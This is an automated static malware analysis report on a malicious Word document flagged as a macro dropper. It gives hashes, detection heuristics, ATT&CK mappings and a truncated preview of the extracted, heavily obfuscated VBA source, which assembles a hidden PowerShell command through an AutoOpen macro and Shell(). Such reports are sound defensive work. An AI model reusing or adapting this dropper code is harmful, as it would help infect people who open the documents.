Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c3afe5ee4fddaa0c…

MALICIOUS

Office (OLE)

97.5 KB Created: 2018-06-06 18:14:00 Authoring application: Microsoft Office Word First seen: 2018-06-21
MD5: 7c4d734058fe47f4598843a7b805d2ef SHA-1: b42602c6f1aff09ed475a19ff93393885eacc9aa SHA-256: c3afe5ee4fddaa0cef8b719e8ae18f1086004c6c42d5b236e2e29b8ce6be09d0
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers the execution of a Shell() command, which is a common technique for downloading and executing further malicious payloads. The ClamAV detection also confirms its malicious nature.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6575795-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6575795-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13840 bytes
SHA-256: 1d4e19622d005395233c13e3b2f1d02fc00484f5750ccf100b05f93ab1ce34d5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "wBwhrzqzUSjYM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function bnlTzrJjnHf()
On Error Resume Next
EjGanR = CStr(nAQLD * Tan(UIdDT * Int(NjdDw * Sqr(59687) / WRaGB + Fix(93776)) / 47850 * Round(47345 / Log(50332 - QqKwA) + 84374 - wcJWP)) / 73307 + CByte(92809))
PYrNbc = CStr(vdutM * Tan(POizuG * Int(MIRNp * Sqr(34205) / TVnHi + Fix(58614)) / 37034 * Round(72604 / Log(46067 - KzZGvh) + 7628 - fRhOf)) / 44843 + CByte(39247))
bnlTzrJjnHf = LLauUw + Shell(vkPwIhhwiPV + Chr(obbVOzV + vbKeyC + VSUXs) + RLHRYPdOiP + bnEOsmiXO + nZYIf + lZkNmsWlmJ + tYjziQ + LQqzQKpMwK + jpDMb, 9444 - 9444)
iaGHiY = CStr(Vqapn * Tan(hadqz * Int(vhHRaN * Sqr(13423) / AZFqQ + Fix(74677)) / 99342 * Round(91857 / Log(85319 - QCmpDQ) + 41022 - QrzqDX)) / 65146 + CByte(66575))
End Function
Sub Autoopen()
On Error Resume Next
zbJfu = CStr(PIvkj * Tan(APmiw * Int(uCFdqv * Sqr(66283) / PMKWhI + Fix(64832)) / 26933 * Round(3964 / Log(38737 - zVfXhI) + 60514 - TPcLHE)) / 95138 + CByte(75939))
bnlTzrJjnHf
TTkNzz = CStr(CwYDb * Tan(mNSzzE * Int(fYVLK * Sqr(28963) / nACRjU + Fix(3268)) / 90077 * Round(66224 / Log(67668 - BXXUi) + 68381 - KccPtH)) / 9644 + CByte(85840))
End Sub


Attribute VB_Name = "AuwZDiQUBw"
Function RLHRYPdOiP()
On Error Resume Next
FWqjah = CStr(vYkDXY * Tan(qJiFiE * Int(iZrEXY * Sqr(16761) / EtdHVw + Fix(60477)) / 4656 * Round(87640 / Log(52186 - WlZLs) + 95242 - frAlE)) / 46402 + CByte(22957))
IBsXHOtijM = "md OAKkh" + "MoUE" + "BbitR " + "UF" + "ZNCwSiucHQi" + "TaqsTcCBS" + "Kqvjc OMmQJDd &" + "    " + " %^c^o^m^" + "S^p^E"
awzbCJ = CStr(wTqZPD * Tan(LGoiK * Int(MFOzHK * Sqr(86734) / zTpFv + Fix(47435)) / 41473 * Round(67518 / Log(5584 - YLfoF) + 39797 - hKdjt)) / 92749 + CByte(49707))
CQfRZdjG = "^c^%    " + " %^c^o^m^S" + "^p^E^c^%" + "     /V    " + "     /c     " + "      " + "set %nFzwwRP"
djViA = CStr(sPZwA * Tan(UUijc * Int(XGwDY * Sqr(98772) / jZAPlE + Fix(44994)) / 29732 * Round(83809 / Log(35469 - AACwfv) + 10863 - FTwNfz)) / 7993 + CByte(80597))
ZQnOU = "HZwKA" + "Lbk%=ZorSmPXH" + "Sqif&&set " + "%idQG" + "cvW" + "jbbL%=p&&set %M" + "jBMuIROS%=o^w"
TPZLW = CStr(UvsAou * Tan(mcCpjb * Int(aaCwj * Sqr(87416) / hMUSjO + Fix(96694)) / 92003 * Round(54414 / Log(86765 - dMiBnv) + 33204 - djWKpQ)) / 55904 + CByte(77655))
VvapdDZAun = "&&set %QV" + "zVQ" + "Pnk" + "tX"
tMbccO = CStr(iYhHji * Tan(AIMCOT * Int(nHjoQ * Sqr(87370) / BiBDZ + Fix(98746)) / 5079 * Round(30717 / Log(34369 - BwvTP) + 26188 - NwqWC)) / 56568 + CByte(27888))
zoazwwaQqi = "jk" + "lLk%=kfQZdaM" + "bRkrYis&&" + "set %USuhH" + "FnGGMPHM" + "O%=!%" + "idQG"
VaGEu = CStr(MUbjtf * Tan(Gfnkr * Int(BQXFY * Sqr(88472) / bRCpz + Fix(2307)) / 75489 * Round(79998 / Log(9102 - wLXNo) + 56354 - mVhGG)) / 38258 + CByte(5827))
zqbfJiwoDj = "cvWjbb" + "L%!&&set %dGjj" + "qEwojvnAsCI%=ha" + "icWmZJ&&set %AF" + "WBFmpHI%=" + "e^r&&set " + "%aPnrB" + "DrikntN" + "l%=!%MjBMu"
KSNzzV = CStr(KXMvSm * Tan(ssNCGr * Int(TzMnD * Sqr(36190) / MQUzz + Fix(6728)) / 78298 * Round(67667 / Log(49632 - HDOAzA) + 87682 - hFdos)) / 8812 + CByte(26318))
NzcmT = "IROS" + "%!&&set %jEb" + "NGnv" + "BH" + "%=s&&" + "se" + "t %CqIYE"
MrUBK = CStr(CfwGsz * Tan(isJSV * Int(CcYTzS * Sqr(54023) / NZXYP + Fix(68679)) / 76430 * Round(82091 / Log(95075 - YhOAj) + 4313 - IvszMU)) / 42323 + CByte(43382))
acMRWB = "jY" + "PCBta" + "BCV%=zwvU" + "ldhKTKDQ&&se" + "t %BIiG" + "OOl%=" + "he&&set " + "%PijtLNcL" + "japj%=ll&&" + "!%USuhH"
KjoXW = CStr(iXoGai * Tan(Oirvtu * Int(jBtWao * Sqr(43992) / WBFBBF + Fix(47761)) / 7984 * Round(4384 / Log(49749 - qzqMdb) + 19463 - hOHRab)) / 65792 + CByte(56435))
MntnFjZPd = "FnGGMPHMO%!!%aP" + "nrB" + "DrikntNl%!!%A" + "FWBFmpHI%!!" + "%jEbNGnvBH%!!%" + "BIiG" + "OOl%!" + "!%PijtLNc" + "Ljapj%! "
qSwiL = CStr(AnAZhW * Tan(apVBEo * Int(pQuQIp * Sqr(40005) / jfZTc + Fix(30656)) / 26386 * Round(69279 / Log(55761 - iA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.